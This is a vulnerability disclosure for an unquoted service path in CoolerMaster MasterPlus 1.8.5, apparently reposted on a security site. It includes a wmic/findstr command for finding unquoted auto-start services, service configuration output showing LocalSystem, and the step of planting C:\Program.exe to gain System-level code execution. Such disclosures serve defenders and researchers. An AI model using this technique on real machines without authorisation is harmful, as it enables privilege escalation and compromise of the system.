CoolerMaster MasterPlus 1.8.5 Unquoted Service Path

2023.04.02
Credit: Damian Semon Jr
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path # Date: 11/17/2022 # Exploit Author: Damian Semon Jr (Blue Team Alpha) # Version: 1.8.5 # Vendor Homepage: https://masterplus.coolermaster.com/ # Software Link: https://masterplus.coolermaster.com/ # Tested on: Windows 10 64x # Step to discover the unquoted service path: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ CoolerMaster MasterPlus Technology Service MPService C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe Auto # Info on the service: C:\>sc qc MPService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MPService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : CoolerMaster MasterPlus Technology Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload "Program.exe" in C:\ and restart service or computer to trigger. Ex: (C:\Program.exe)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top